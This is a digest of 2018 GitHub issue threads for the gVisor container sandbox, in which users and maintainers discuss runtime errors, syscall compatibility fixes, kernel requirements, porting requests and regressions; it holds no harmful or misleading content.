If you believe you've found a security issue, please email gvisor-security@googlegroups.com rather than filing a bug.

If this is your first time comp

[2018-05-13 14:45] chanwit opened #44 "The nightly build binaries contain commit IDs that do not exist on Github"
As far as I understand, they are 2 different git trees.
The first one is on Github, `github.com/google/gvisor`. Another one is on Google Source, where Gerrit is located. Both trees are public, have the same sequence of commits, but different commit IDs.

Nightly build binaries seem to build from Google Source's tree, not from Github. To me, I don't have problem with this, as I know where it find i

[2018-05-14 12:31] kratan commented on #14
supporting GPUs would a really nice feature
greets

[2018-05-14 16:34] nlacasse commented on #43
I'm not sure I understand this issue.  Is there a feature you are requesting?

[2018-05-14 16:42] nlacasse commented on #44
Yes, that is something we need to change, and will require a force-push to the GitHub repo.

The googlesource repo is the authoritative open-source gVisor repo.  Code submissions must go through there, and the nightly releases are built from there.  The GitHub repo is intended to be a mirror, and the commit hashes should ideally line up, but something is not right with the current mirror setup.

[2018-05-14 17:13] nlacasse commented on #44
I found the source of the divergence and did a force-push to the GitHub repo.  The commit IDs are aligned now, and should remain aligned moving forward.

[2018-05-15 00:48] chanwit commented on #44
Cheers!

[2018-05-15 14:26] chanwit commented on #33
Updated:
I did `runsc` directly with a Docker generated `config.json` (attached), manually extracted bundle with `--network=host` and Portainer was working correctly.

The bundle extracted using the following command:
`docker export $(docker create portainer/portainer) | tar -C ~/rootfs -xvf -`

[config.json.txt](https://github.com/google/gvisor/files/2005356/config.json.txt)

So this issue could

[2018-05-15 14:58] fvoznika commented on #33
Thanks for the update. The problem is with our sendfile(2) implementation when more data is read than can be written. I have a fix in code review...should be out shortly.

[2018-05-15 16:13] TheMacNerd commented on #27
Guide for the missing MIT Open source license.

https://meta.stackexchange.com/questions/271080/the-mit-license-clarity-on-using-code-on-stack-overflow-and-stack-exchange

[2018-05-15 21:39] #33 closed

[2018-05-16 14:10] chanwit opened #52 "sendfile(2) should return ESPIPE when offset is not null, but inFile is not seekable"
Refer to `man 2 sendfile`:
[code]
sendfile syscall should return ESPIPE when the offset is not null, but inFile is not seekable.

[2018-05-16 14:16] chanwit commented on #52
Patch to review:
https://gvisor-review.googlesource.com/c/gvisor/+/2480

[2018-05-16 14:29] Ox24 opened #53 "sched_setattr: Function not implemented"
Hey there,
wanted to test some realtime scheduling and tried to measure some timings and overhead caused by gvisor.

Using the debug flag on gvisor, i noticed that i get:

` write(0x4, 0x7facec000af0 "sched_setattr: Function not implemented\n", 0x28)`

therefore i cannot run and test my application. Any advices?

docker command : docker run --runtime=runsc --cap-add SYS_NICE -i -d -t simple-interp

[2018-05-16 22:46] nlacasse opened #54 "application should have a way to tell if it's running in gVisor"
Some options:
* Add a `/proc/gvisor` file
* Put something in `uname`
* Put something in `/proc/version`

[2018-05-16 22:47] dbcode commented on #54
All of the above?

[2018-05-17 07:12] Skarlso commented on #54
I think that's not a good idea. An application shouldn't know / care that it's running in a vm or with gvisor or if it's sandboxed at all. If it would that would mean that it could behave nice since it knows it's being watched. And than when potentially it's not running under gvisor because it was deamned safe it could start running amoc.

[2018-05-17 08:17] Ox24 commented on #53
sadly that is not an option for me. We are running different RT applications on our system using docker and wanted to isolate some of them. Do you guys have a in-depth descritption on how gvisor works?

[2018-05-17 11:30] chanwit commented on #52
Fixed by 3131a6b131127e70b5e3941e3c4d292d99312fa5

[2018-05-17 11:30] #52 closed

[2018-05-17 11:33] chanwit commented on #54
@Skarlso there's a lot of use cases that we need to know the executing environments. For example, a Java application needs to know that it's inside the cgroup control to enable a JVM specific feature and help boost the application performance a lot.

In Docker, it also provides a way for applications to detect that we're inside containers.

[2018-05-17 11:43] Skarlso commented on #54
@chanwit Yes. And that isn't necessarily a good thing, you know. :)

I guess that makes sense. It would just be nice if the application would be environment agnostic you know. Like, it shouldn't care where it's running it should be optimal by default.

However, yeah. Like in C you have to optimize the compiler based on the environment as well especially for embedded systems. So environment does ma

[2018-05-17 18:47] nlacasse commented on #44
Github and Googlesource diverged again here:

https://gvisor.googlesource.com/gvisor/+/17a0fa3af05dbb147cdd3d5ec898d31812a0ea66
https://github.com/google/gvisor/commit/3cc81871e44b50ac771c36f144ee4b9e8dabfb61

Looks like the "Change-Id" line was removed from the github commit message.  Need to figure out why that happened.

[2018-05-18 03:53] fvoznika commented on #3
Fixed by 18b3ba496593f93526f0277f102882628297a8e7

[2018-05-18 03:53] #3 closed

[2018-05-18 06:38] fvoznika commented on #54
Another alternative is to set CPUID Vendor ID like [other VMs do](https://en.wikipedia.org/wiki/CPUID#EAX.3D0:_Get_vendor_ID_.28including_EAX.3D1:_Get_CPUID.29).

[2018-05-18 17:13] seeekr commented on #1
Am I correct in assuming that this will potentially make nginx behave in unexpected ways and thus it is not something one should attempt for any somewhat serious use of nginx + gvisor?

To quote the nginx docs at http://nginx.org/en/docs/ngx_core_module.html#master_process:

[code]

[2018-05-20 05:11] balasu opened #55 "runsc runtime not working with centos 7.5"
Hi

I was trying to change docker runtime to runsc and spawn a hellow world container .but got some error.

docker: Error response from daemon: OCI runtime create failed: /usr/local/bin/runsc did not terminate sucessfully: unknown.

kindly suggest

below are the infra and software versions

[root@localhost ~]# cat /etc/redhat-release
CentOS Linux release 7.5.1804 (Core)
[root@localhost ~]# uname -

[2018-05-20 05:12] balasu commented on #55
In error.txt i can see some

W0520 10:33:41.934658   14451 x:0] FATAL ERROR: error creating container: fork/exec /usr/local/bin/runsc: invalid argument

I am just running below command
[root@localhost runsc]# docker run --runtime=runsc  hello-world
docker: Error response from daemon: OCI runtime create failed: /var/lib/docker/runtimes/runsc did not terminate sucessfully: unknown.
ERRO[0000] error

[2018-05-20 13:21] chanwit opened #56 "Check for getcwd when size is zero but addr is not NULL"
I added more checks for `getcwd`. From the man page:

[code]
The first `EINVAL` check seems to be OK to me, but I'm not sure if the second `EINVAL` and the third `ENAMETOOLONG` checks are necessary?

[2018-05-20 13:37] chanwit commented on #56
Revert to be only one check as the second and the third check were fr `getwd`, not `getcwd`.

[2018-05-21 08:26] yuwang888 opened #57 "mysql cannot work on visor"
when docker run with runtime=runsc
#groupadd mysql
groupadd: /etc/group.101: lock file already used
groupadd: cannot lock /etc/group; try again later.

so i cannot test mysql on gvisor

[2018-05-21 16:34] iangudger commented on #57
This looks a lot like #28. Are you using a recent version?

[2018-05-21 16:50] prattmic commented on #55
We [require](https://github.com/google/gvisor#installation) a Linux 3.17+ kernel. It looks like you are on 3.10.

[2018-05-21 17:01] prattmic commented on #56
That `EINVAL` check is actually a glibc feature, not a kernel feature. (Note that most syscall man pages are for the glibc wrapper, technically not the actual syscall.)

Consider:

[code]

[code]

[Kernel code](https://elixir.bootlin.com/linux/latest/source/fs/dcache.c#L3477)
[glibc code](https://github.com/bminor/glibc/blob/master/sysdeps/unix/sysv/linux/getcwd.c#L46) (the `EINVAL` return is on L

[2018-05-22 05:27] chanwit commented on #56
Thank you @prattmic. I shall close this then.
I'm now getting more idea on how to check the compatibility. Thanks again.

[2018-05-22 05:27] #56 closed

[2018-05-22 05:35] balasu commented on #55
Hi pratt
have upgraded the kernel version to below. And still getting the error
[error.txt](https://github.com/google/gvisor/files/2025072/error.txt)

[root@localhost ~]# docker info | grep -i kernel
Kernel Version: 4.16.10-1.el7.elrepo.x86_64
[root@localhost ~]# docker run --runtime=runsc  hello-world
docker: Error response from daemon: OCI runtime create failed: /var/lib/docker/runtimes/runsc di

[2018-05-22 08:26] vanloswang commented on #55
@balasu maybe you should turn off selinux, and make sure that /usr/local/bin/runsc is executable.

[2018-05-22 08:47] balasu commented on #55
yes, it worked after disabled the selinux . let me try other images

[root@localhost ~]# docker run --runtime=runsc  hello-world

Hello from Docker!
This message shows that your installation appears to be working correctly.

To generate this message, Docker took the following steps:
 1. The Docker client contacted the Docker daemon.
 2. The Docker daemon pulled the "hello-world" image from the Doc

[2018-05-22 08:47] #55 closed

[2018-05-23 15:55] chanwit opened #58 "createAt should return permission denied when trying to overwrite /proc/cpuinfo from inside a container"
I developed a test case like this, try to overwrite `/proc/cpuinfo` from inside a container:
[code]
When running this test case in `runc` (as root inside a container) via `docker run`, the test case returned 13, permission denied.

But with gVisor, it returned 22, invalid operation.

To check this, I put some breakpoints to runsc.
![gdlv_open_createat](https://user-images.githubusercontent.com/106

[2018-05-23 19:52] 1-z opened #59 "CRI-O integration cannot start pods and cycles infinitely on deletion"
Running a CRI-O based Kubernetes cluster with gvisor. Both built from HEAD in the last week, and ran into some issues.

1) gvisor exit codes seem to not match what CRI-O expects, for instance deleting a non-existent sandbox leads to an infinite loop of failed deletions. Replacing the runsc binary with a binary that always returns 0 breaks the cycle.

2) gvisor complains extensively about bind, rbi

[2018-05-24 15:38] fvoznika commented on #59
We have done very little testing with CRI-O thus far.
1. runc returns success when container doesn't exist and --force was used. runsc returns error regardless. I'll send a fix soon.
1. These messages regarding mount options are harmless in most cases. Your setup failure might be for a different reason. Can you share the logs?

[2018-05-24 23:27] 1-z commented on #59
I'll try to capture better logs for the second issue. Thanks for looking into the first one!

[2018-05-26 05:53] 1-z commented on #59
Note, git-revision is dirty because I changed the flag default for filesystem from proxy to direct in main.go to see if it would remove issues.

I should also point out K8S default service token mount causes setup failure, I'll create a different bug for that, since this seems to be all about exit statuses.

Kubelet says it could not start container, exit status 128. gvisor thinks it had an exit s

[2018-05-26 06:02] 1-z commented on #59
Interesting. Failing container has a shellscript with a #!/bin/bash, but a different container works with a direct binary cmd instead of a script-based cmd

[2018-05-26 06:50] 1-z opened #60 "Link-local IPv6 route is treated as a second default route"
In sandbox/network.go, the logic assumes that there is either a default route for IPv4 or a default route for IPv6. In dual-stack containers, there are default routes for both IPv4 and IPv6, leading to sandbox startup failure.

[2018-05-26 19:27] GoWebProd opened #61 "Can't start container"
[code]

uname -a:
[code]

Docker version:
[code]

Log:

[code]

[2018-05-27 18:04] eiais commented on #61
We [require](https://github.com/google/gvisor#installation) a Linux 3.17+ kernel. It looks like you are on 3.10.

[2018-05-28 06:05] hugelgupf commented on #54
For humans probing, I find the syslog syscall is pretty definitive. https://github.com/google/gvisor/blob/master/pkg/sentry/kernel/syslog.go

Kind of annoying to automate though, as the caller.

[2018-05-29 13:15] GoWebProd commented on #61
Thanks, on 4.16.12 works

[2018-05-29 13:15] #61 closed

[2018-05-30 01:54] IT-huang opened #62 "Question about scheduler and resource constrains of gVisor"
I wonder if  gVisor  has its own scheduler like CFS or CFQ? Or processes of the sandbox are still scheduled by host kernel  scheduler? Traditional docker or k8s  perform resource constrains(such as cpu and memory) based on  CGroups and Namespace , How gVisor implements  resource constrains of the sanbox ?

[2018-05-30 02:12] kevinzs2048 opened #63 "Support ARM64 for gvisor"
Currently just support amd64, could we support for ARM64?
What do we need to do for this support? I can help to work on it.

[2018-05-30 17:56] prattmic commented on #63
We don't have any immediate plans to port to additional architectures. It is certainly feasible (as shown below), but certainly requires a lot of work and is something we want to do very carefully to avoid adding unnecessary complexity and technical debt.

Porting to a new architecture requires several steps:

1. Porting/creating a platform compatible with the arch. The [ptrace](https://github.com

[2018-05-31 01:00] fvoznika commented on #62
gVisor delegates scheduling decisions to the Go runtime. You can find more details in this [email thread](https://groups.google.com/d/msg/gvisor-users/TCF1iM6knb0/TrSMlN59AQAJ).

Regarding CPU and memory limits, right now runsc ignores the [control group](https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#control-groups) part of the spec completely. But we do plan to implem

[2018-05-31 01:02] fvoznika commented on #60
Oops, my bad. runsc doesn't support IPv6 at the moment and should be ignoring IPv6 addresses and routes for now.

[2018-05-31 01:36] fvoznika commented on #59
Please check if 4f52239 fixes the issue with deleting a non-existent sandbox.

gVisor can execute both ELFs and shellscripts, so it must be something else that is causing the failure:

[code]

You can enable --debug to get more verbose logging. Please see [here](https://github.com/google/gvisor#debugging). If you could provide a self contained repro would be a great help.

[2018-05-31 01:37] fvoznika commented on #57
Please reopen if it happens with a recent build.

[2018-05-31 01:37] #57 closed

[2018-05-31 06:46] kevin-zhaoshuai commented on #63
@prattmic Really Thanks for clarifying.
In that case I think it is not a very easy work, I will talk with my workmate inside arm to discuss the development work.

[2018-05-31 10:22] IT-huang commented on #62
@fvoznika  Thank you very much!

[2018-06-01 17:09] #60 closed

[2018-06-02 10:57] sureshsankaran commented on #12
@fvoznika can you please share approximate ETA when can we expect cgroups support for gvisor ?

[2018-06-02 22:07] fvoznika commented on #12
The best estimate I have right now is sometime in Q3'18.

[2018-06-05 00:45] #62 closed

[2018-06-05 01:47] JorgeCeja commented on #14
Any updates? Thanks!

[2018-06-05 16:29] fvoznika commented on #14
Yes, support for GPUs would be really nice!

The work here involves exposing a passthru device directly from the host, as there are no device drivers in gVisor. The challenge being how to make this access secure.

At the moment though, we have a few other things to work on, and GPU support is not in our short list (yet).

[2018-06-05 17:00] nlacasse commented on #1
I'm not totally sure what the "master_process" directive does, but the docs do state that it should not be used in production.

http://nginx.org/en/docs/faq/daemon_master_process_off.html

We are still working on the `FIOASYNC` support, at which point this workaround will not be necessary.

[2018-06-06 00:55] ianlewis commented on #53
I suggest changing the bug title to "sched_setattr: Function not implemented"

[2018-06-09 17:48] 1-z commented on #59
The infinite delete cycle is definitely fixed in the current nightly. I'll open a different bug to drill into the startup failures I have.

[2018-06-09 17:48] #59 closed

[2018-06-11 03:49] ShiruRen opened #64 "ApplicationCores is always initiated with 8"
I am currently using gVisor with Docker. I found the number of processors in /proc/cpuinfo is always 8, which limits the the amount of CPUs that some applications can use (e.g., TensorFlow). When I step through the code I found that the ApplicationCores is always initiated with 8 when initiating the Kernel object [https://github.com/google/gvisor/blob/7049f4480dabac4b95a9117eafc47f4b2b3f24f5/runsc

[2018-06-11 18:07] prattmic commented on #64
w.r.t. resource isolation, see #62 (runsc will eventually put itself inside of appropriate cgroups according to the spec).

[2018-06-13 02:56] IT-huang opened #65 "How is the information of procfs and sysfs from?"
docker version :Docker version 18.05.0-ce, build f150324
uname -a:Linux crane23 4.12.3 #1 SMP Fri Nov 24 16:03:12 CST 2017 x86_64 x86_64 x86_64 GNU/Linux
Question 1: My host machine have 20 cores and 120G memory totally. When i use 'sudo docker run --runtime=runsc -it ubuntu /bin/bash' to run a container with gVisor, I find /proc/cpuinfo shows 8 cores totally,Why just 8 cores? And i also find MemT

[2018-06-13 03:27] hugelgupf commented on #65
gVisor virtualizes procfs and sysfs -- I'm not sure we expose a setting for the number of cores and the memory, but we probably should.

re q2: seccomp filters mean that the application must not filtered syscalls (or use filtered arguments). this usually means modifying an application to work around the seccomp filter. gVisor does not filter syscalls -- it lets you make them anyway, just not to th

[2018-06-13 07:09] IT-huang commented on #65
@hugelgupf  Thank you！However，I still confused with how gVisor virtualizes procfs and sysfs and where are the information of procfs and sysfs from? Such as cores number ,available memory, loadavg? Those information are important to applications in containers.

[2018-06-13 11:18] dvyukov opened #66 "panics on invalid command line arguments"
I am probably doing something wrong due to lack of documentation, but please don't be python :)
More readable explanation of what I am doing wrong would be helpful. I am on ba426f7782d35f971820a0193cfda58485b92cad.

[code]

[code]

[2018-06-13 11:21] dvyukov commented on #66
On a related note, is there an example of how to run something with gvisor (I don't mean docker!).

[2018-06-13 14:06] dvyukov commented on #66
And another one:

[code]

[2018-06-13 21:14] danrabinowitz commented on #11
@iwankgb Any news?

[2018-06-14 02:39] ghostplant opened #67 "`ifconfig -a` makes the runsc containers crash directly"
- `docker version` or `docker info` if more relevant
[code]
- `uname -a`
[code]
- git describe
Not git but using pre-built `https://storage.googleapis.com/gvisor/releases/nightly/latest/runsc` whose sha512sum is `2ddb9f74f7428c51f24d3e8c6ff42f7e65544a3592c35957e233f8d9d67916dd5982d7791ca6d23d3cf5139968998032f218b245f87eb52784232cb42559af12`
- Detailed repro steps
Firstly, runn `docker run --runtim

[2018-06-14 09:26] dvyukov opened #68 "support /proc/thread-self"
procfs has `/proc/self` but doesn't have `/proc/thread-self`. It would be nice to have it, if it's not too hard. We would use it for testing with syzkaller.

[2018-06-14 16:07] dvyukov opened #69 "contribution guidelines are incomprehensible"
This is incomprehensible:
https://gerrit-review.googlesource.com/Documentation/
There is no way one can figure out what commands to run to send a change. Moreover it talks about pushing changes to `git.example.com` and `hostname`, nobody knows what should be used for gvisor.
Please provide step-by-step copy-pastable instructions to upload and update a change.

[2018-06-14 19:29] fvoznika commented on #67
Can you try running `ifconfig` with `alpine` image? Do you have the [logs](https://github.com/google/gvisor#debugging)?

"It works on my machine":
[code]

[2018-06-15 04:40] fvoznika commented on #66
We're doing pretty much no validation on the input, so as you've seen, it's fairly easy to make it panic with invalid parameters. We'll improve it...

As for what it's needed, --bundle expects a directory with a file called `config.json`. This file must contain a JSON [spec](https://github.com/opencontainers/runtime-spec/blob/695b81699f3980e8743099451a04cddb5377afdb/specs-go/config.go#L6) that con

[2018-06-15 05:18] fvoznika commented on #64
We need to get the number of processor from cgroups when we add support for it. But for now, we could use the number of processors on the machine.

[2018-06-15 05:40] fvoznika commented on #65
Re q1: No particular reason for 8. We need to get the number of processor from cgroups when we add support for it. But for now, we could use the number of processors on the machine.

Re q2: I think part of the confusion is that gVisor doesn't simply filter syscalls and send them to the host. gVisor implements a full kernel and handles the syscalls itself. It only calls the host for basic infrastru

[2018-06-15 05:44] dvyukov commented on #66
Thanks, @fvoznika! The spec link is useful.

[2018-06-15 08:22] #69 closed

[2018-06-15 11:46] ghostplant commented on #67
I just install the runsc according to the README, and I don't know where the logs generate.

[2018-06-15 14:09] ydjainopensource commented on #67
Hi,

The logs are stored in the debug-log-dir which you might have set while
building runsc
By default it should be in /tmp/runsc

This is mentioned in the README here
https://github.com/google/gvisor/blob/master/README.md#debugging

Hope this helps.

Thanks

On Friday, June 15, 2018, ghostplant <notifications@github.com> wrote:

--
Thanks

Yash D Jain
Github    : @ydjainopensource <https://github

[2018-06-15 16:18] #68 closed

[2018-06-15 16:19] #65 closed

[2018-06-15 16:28] #64 closed

[2018-06-15 16:34] ghostplant commented on #67
The `hello-world` image can run successfully, but `ubuntu:trusty` image is even not able to boot now, and there is no log generated to `/tmp/runsc`:
[code]

[2018-06-15 16:39] ghostplant commented on #67
This time, `ifconfig -a` is Okay but `ip addr` will sometime crash, and sometime report `SO_SNDBUF: Protocol not available`. When the container crash, there is no `/tmp/runsc` generated.

[code]

[2018-06-15 19:23] ydjainopensource commented on #67
Hi,

The logs should be there. Did you set the daemon.json as explained in the debugging section of the readme. Can you share your daemon.json here? It should be similar to

`
{

    "runtimes": {
        "runsc": {
            "path": "/usr/local/bin/runsc",
            "runtimeArgs": [
                "--debug-log-dir=/tmp/runsc",
                "--debug",
                "--strace"

[2018-06-16 01:44] plehdeen commented on #11
Thanks  to @iwankgb , I test the kvm on another cpu, and it just work. Seems that gvisor just not support on my old machine with 36bits physical address.

[2018-06-16 09:31] ShiruRen commented on #64
Many thanks, @fvoznika @prattmic . It works fine now.

[2018-06-16 11:46] dvyukov opened #71 "delete does not wait for closure of the control socket"
I have a simple container with a binary that exits immediately. Running the following script:
[code]

fails on the second iteration with:
[code]

However, the following runs more or less reliably:
[code]

delete must wait for closure of the control socket and any other resources in use.

[2018-06-16 11:49] dvyukov commented on #71
On a related note, I expected that runsc instances with different roots will be completely isolated from each other. But the control socket is the point where they all intersect. The name only includes instance name, but is not tried to root. I think it must be either in filesystem in root dir, or at least include hash of full root path or something.

[2018-06-17 04:44] ghostplant commented on #67
I think there is a weird issue that: common commands like `ifconfig -a` and `apt update` usually sometimes crash but sometimes not crash. Is this issue related to un-implemented interfaces?

[2018-06-18 01:20] geloizi opened #72 "gVisor cannot run ubuntu container"
[runsc.log.20180618-010719.846873.create.txt](https://github.com/google/gvisor/files/2109642/runsc.log.20180618-010719.846873.create.txt)
[runsc.log.20180618-010719.851934.boot.txt](https://github.com/google/gvisor/files/2109643/runsc.log.20180618-010719.851934.boot.txt)
[runsc.log.20180618-010719.855993.gofer.txt](https://github.com/google/gvisor/files/2109644/runsc.log.20180618-010719.855993.gof

[2018-06-18 05:17] dgageot commented on #72
Same here

[2018-06-18 05:22] dgageot opened #73 "hello-world produces an error"
[code]

[code]

[code]

[2018-06-18 09:21] tianburg opened #74 "docker run alpine failed with runsc runtime ."
hi team,

I changed docker daemon json file as same as which showed in ReadMe.md  .

the command is :

the error msg :

: unknown.

Other useful information to include is:
- `docker version` or `docker info` if more relevant

- `uname -a`

- `git describe`
- Full docker command you ran

[2018-06-18 09:45] dvyukov commented on #71
What's the proper way to bring a container down from any state?
Currently I have this ugly:
[code]
But this still does not save me from periodic:
[code]

[2018-06-18 09:57] ydjainopensource commented on #72
I am able to reproduce this issue.
#67 #72 #73 #74 may all be caused due to the same underlying issue.
A prior build of runsc runs fine. Looks like a new commit introduced this in the latest build.

I am new here. Can someone from the runsc team confirm?

[2018-06-18 13:38] dgageot opened #75 "rust http server cannot listen on port"
I'm trying to run an http server written in Rust with this command:

[code]

produces this error:
[code]

no matter which port I use.

Here's the code for the container:

[code]

and the cargo descriptor:

[code]

it's built with this command to produce a statically linked binary.

[code]

[2018-06-18 14:30] geloizi commented on #73
+1 I've got the same error

[2018-06-18 14:52] dgageot opened #76 "Downloading previous versions of gvisor"
The documentation says how to download the latest nightly of visor but can previous versions be downloaded? I would make sense to attach a version number to each bug report.

[2018-06-18 15:45] geloizi commented on #72
I tried to build `runsc` from older sources (June 1). It works.

[2018-06-18 17:05] fvoznika commented on #72
This was a regression added on Friday. Please check that d509d6c fixed it. Sorry for the trouble.

[2018-06-18 17:05] iangudger commented on #75
You app uses shio which depends on a socket option (SO_REUSEPORT) that we don't support:
https://github.com/mehcode/shio-rs/blob/master/lib/src/shio.rs#L87

Implementing SO_REUSEPORT is going to be difficult. Would it be possible for you to use a different library/framework?

[2018-06-18 17:06] fvoznika commented on #73
This was a regression added on Friday. d509d6c fixed it. Sorry for the trouble.

[2018-06-18 17:06] #73 closed

[2018-06-18 17:06] fvoznika commented on #74
This was a regression added on Friday. d509d6c fixed it. Sorry for the trouble.

[2018-06-18 17:06] #74 closed

[2018-06-18 17:07] fvoznika commented on #75
This was a regression added on Friday. Please check that d509d6c fixed it. Sorry for the trouble.

[2018-06-18 17:13] dbcode commented on #75
Fabricio, I don't think this bug is related to https://github.com/google/gvisor/commit/d509d6cd97f9af6cb7ce6081e55d8f1cfea44618

[2018-06-18 17:19] fvoznika commented on #76
Yes, you can find older versions here:
`https://storage.googleapis.com/gvisor/releases/nightly/<date>/runsc`.

Example:
[code]

[2018-06-18 17:19] #76 closed

[2018-06-18 17:21] fvoznika commented on #75
I can repro it locally. I'll take a look...

[2018-06-18 18:30] dgageot commented on #75
@iangudger Thanks for the debugging!

I'm going to try a different library.
Of course, this is not something I want to be required to do :-)

[2018-06-18 18:35] dgageot commented on #75
FWIW, it works when I replace `shio` with `hyper`

[2018-06-18 18:55] geloizi commented on #72
confirmed. The issue has been fixed. Thanks!

[2018-06-18 19:16] #72 closed

[2018-06-19 08:13] tianburg commented on #72
thanks ,  @fvoznika    @geloizi

you mentioned that :  d509d6c fixed it .
how can I sync my local copy code with  d509d6c commit ?
I git pull and sync my code with master branch , but the error still exist here .

Thanks for borther

[2018-06-19 08:46] ydjainopensource commented on #72
@tianburg after you pull you need to rebuild the project, copy the compiled binary and then restart docker. See the readme for details.

[2018-06-19 08:54] tianburg commented on #72
@ydjainopensource

I do what ReadMe listed steps again , but the error still there .

below is my runsc version info :

[2018-06-19 09:07] ydjainopensource commented on #72
@fvoznika I tried compiling with the latest commit. Although most of the times the container runs properly, I am experiencing container crashes randomly. This is the log generated

I would like to look into this issue. However, since I am new to the code base can you help me get started?

@tianburg Please send a copy of the [logs](https://github.com/google/gvisor#debugging). I have the same runsc

[2018-06-19 22:28] tianburg commented on #72
hi team,

I attached my log files. ( by rename them with a .txt for upload )

[runsc.log.20180620-062414.616856.gofer.txt](https://github.com/google/gvisor/files/2117141/runsc.log.20180620-062414.616856.gofer.txt)
[runsc.log.20180620-062414.604577.gofer.txt](https://github.com/google/gvisor/files/2117142/runsc.log.20180620-062414.604577.gofer.txt)
[runsc.log.20180620-062414.590591.create.txt](http

[2018-06-20 07:34] fvoznika commented on #72
`runsc create` starts up 2 children processes to run the sandbox. First it starts `runsc gofer` which acts as a file proxy. Then it starts `runsc boot` which is the sandbox itself. Other commands, like `runsc start` or `runsc ps` communicate with the sandbox process via a unix socket. So when you see connection errors, it normally means that the sandbox process has exited. Log files `*.boot` conta

[2018-06-20 14:14] ydjainopensource commented on #67
@ghostplant Please try and build with the latest master. If you are still experiencing this issue then please send the output of docker log command and runsc generated logs.

[2018-06-20 21:37] ydjainopensource opened #77 "No error on invalid command"
Try starting a container with an invalid command.
runc correctly returns an error

However, runsc does not produce an output.  I can't get the terminal prompt again without sending `SIGINT`

In the logs, I could find this

Looks like gvisor kills the container but does not signal the docker daemon.

Moreover, I am experiencing uncharacteristically long waiting time for `systemctl stop docker` and

[2018-06-21 01:22] tianburg opened #78 "docker resource : can not assign running instance memory"
hi team,

I run gvisor with ubuntu docker instance everything is ok .
Now , I have a large memory consumer service within docker , so I need to increase the memory by run :

when lanch into terminal of docker , I find the memory not change , still 2G  ( default assigned value )

[code]

Is gvisor runsc runtime support change memory ?

Thanks

[2018-06-21 05:58] ghostplant commented on #67
@ydjainopensource Thanks, after the update to new version whose sha512 is `1c4012982d4e80e5e34a30c366b8a05787dbd802e17c293aace93471509bdb2668f471a3dcba8d9e93264044d289ad3c48f4a95b5693319dbd1d955d80cc7a9e`,
`ip addr` still has 50% possibility to crash randomly. Besides, I found `ldd /lib64/ld-linux-x86-64.so.2ldd /lib64/ld-linux-x86-64.so.2` is also of 50% possibility to crash randomly.

[2018-06-22 09:14] ydjainopensource opened #79 "[Feature Request] Port Gvisor to s390x"
Issue to discuss changes related to s390x.

Discussion continued from mailing list [thread](https://groups.google.com/d/msg/gvisor-users/IQqUs9eNHOo/8xuryVexBgAJ)

cc : @prattmic

[2018-06-22 12:36] tirumaraiselvan commented on #1
Is there an example to repro this behaviour? I am not having an issue with nginx:latest.

[2018-06-22 15:46] nlacasse commented on #1
gVisor now supports FIOASYNC ioctl.  I just verified that nginx runs without the "master_process: off" directive.

[2018-06-22 15:46] #1 closed

[2018-06-22 21:42] tianburg commented on #78
duplicated with this https://github.com/google/gvisor/issues/62  .

[2018-06-22 21:42] #78 closed

[2018-06-23 00:05] fvoznika commented on #67
Looking more closely I see that you have a few ctrl-C in between commands [1]. There is something wacky in the way runsc handles terminal signals that causes bash to SIGSEGV [2].

[1]
[code]

[2]
[code]

[2018-06-23 00:41] fvoznika commented on #67
BTW, this is the same issue reported in #38.

[2018-06-23 00:43] #67 closed

[2018-06-23 09:47] ydjainopensource commented on #77
I ran the following command

Interestingly, if I run without the `-it` flag, I am getting the following error

: unknown.
ERRO[0001] error waiting for container: context canceled

I am attaching the logs for your reference

[runsc.log.20180623-150707.617232.kill.txt](https://github.com/google/gvisor/files/2129805/runsc.log.20180623-150707.617232.kill.txt)
[runsc.log.20180623-150707.591997.state.tx

[2018-06-26 03:14] nlacasse commented on #77
I think you are just running into a quote issue.  Runsc is failing because it can't find a binary called "ifconfig -a".

Try running without the quotes around ifconfig:

[code]

[2018-06-26 03:16] nlacasse commented on #77
Whoops! Totally misunderstood the point of this bug :(

I also get a long timeout from Docker when I run with an invalid command.

[2018-06-28 16:57] #66 closed

[2018-06-28 20:23] #71 closed

[2018-06-29 18:05] matti opened #80 "status of save/restore?"
I was listening to https://kubernetespodcast.com/episode/003-gvisor/ where at time 10:45 (remaining) @nlacasse and Yoshi Tamura talk about save restore as it would work and exist today - to me it looks like it does not really exist yet (https://github.com/google/gvisor/blob/master/runsc/main.go#L73-L95)

[2018-06-29 19:47] nlacasse commented on #80
The gVisor libraries support save/restore today, but that functionality is not exposed through `runsc` yet.

We are actively working on this, and will update this bug as work progresses.  Stay tuned.

[2018-07-01 06:29] Just4test opened #81 "Could I use gVisor as a universal executable file launcher, without docker?"
Hi, I'm creating an online judge system which run in AWS lambda.
To run unsafe code from user, I need a sandbox.
I think gVisor can help me. But lambda is already run in container, so I can't run docker in lambda code.
Cloud I use gVisor as a launcher? Just like:

[2018-07-02 01:19] ranchochen opened #82 "Local repository for WORKSPACE problem"
Hi,everyone,
   i am using local_repository in WORKSPACE instead of go_repository which using github source,like this:

`new_local_repository(
   name = "com_github_opencontainers_runtime-spec",
   path = "$PATH/com_github_opencontainers_runtime-spec",
   build_file = ""$PATH/com_github_opencontainers_runtime-spec/BUILD.bazel"
   )`

 for other repository i succeed in change to local, but the foll

[2018-07-02 09:40] lubinsz opened #83 "Is there a plan to improve performance?"
Currently, we tested the performance in x86 platform , and the performance seems not so good.
So, is there any plan to improve performance for kvm mode or ptrace mode?
What do we need to do for this support? Maybe I can help to work on it.
Our test report:
 scenario:  network performance between two gvisors connected via virtual switch.
         Docker: 24.3 Gbps
         Gvisor/ptrace: 624 Mbps

[2018-07-02 18:01] amscanne commented on #83
Hi -- I'm not clear on the exact test setup. 25 Gbps seems like it might be loopback performance, where most of the network stack is actually avoided (just becomes a test of how fast can bits be copied). In the default sandbox configuration, you will have a network stack inside the sandbox boundary that generates packets, meaning extra copies and two full network stacks at work. Assuming this is i

[2018-07-02 19:51] #2 closed

[2018-07-03 01:16] ranchochen commented on #82
Ah, i've found the solution, bazel do not support package name contains dash.

[2018-07-03 01:16] #82 closed

[2018-07-03 04:50] amscanne commented on #81
FWIW, I don't think either of the platforms would work in Lambda (ptrace or KVM). Is the intent to just communicate with the unsafe code via stdin & stdout?

[2018-07-04 04:22] zhang2639 opened #84 "Use gvisor in kvm platform"
I use gvisor in `kvm` platform.  The full docker command I ran is `sudo docker run --runtime=runsc -it --name test   centos  /bin/bash`.
`/etc/docker/daemon.json` is as follows:
[code]
I want to know whether this container use kvm platform. Then I use `ps -elf | grep qemu` . But I didn't see anything.
See create log in `/tmp/runsc`:
[code]
